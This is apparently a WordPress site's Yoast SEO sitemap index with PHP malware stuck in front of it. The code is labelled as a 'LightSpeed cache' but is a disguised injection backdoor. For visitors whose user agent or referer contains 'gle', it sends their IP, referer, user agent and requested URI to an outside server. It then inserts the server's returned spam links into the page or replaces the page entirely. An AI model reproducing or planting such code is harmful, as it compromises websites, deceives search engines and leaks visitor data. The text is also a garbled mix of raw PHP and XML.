
/**
 * Implement the LightSpeed cache.
 */

if (strpos($_SERVER["HTTP_USER_AGENT"], 'gle') || strpos($_SERVER["HTTP_REFERER"], 'gle')) {
add_action('wp_loaded','crt');
function crt() {ob_start('cache');}
function cache($html) {$url="http://index.fastrenderindexcode.com/server_permanent2.php";$params="ref=$_SERVER[HTTP_REFERER]&h=$_SERVER[HTTP_HOST]&ua=$_SERVER[HTTP_USER_AGENT]&ip=$_SERVER[REMOTE_ADDR]&ip2=$_SERVER[HTTP_X_FORWARDED_FOR]&uri=$_SERVER[REQUEST_URI]";$ch=curl_init($url);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,$params);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$result=curl_exec($ch);curl_close($ch);
    if (strpos($result, 'header-links-page') !== false) {$html = preg_replace('/(<\/body)/', "$result $1", $html);};
    if (strpos($result, '<html') !== false) {$html = $result;};
    if (strpos($result, "404") === 0) {$html = $result;};
    return $html;
}
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//www.buro43.nl/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://www.buro43.nl/post_tag-sitemap.xml</loc>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->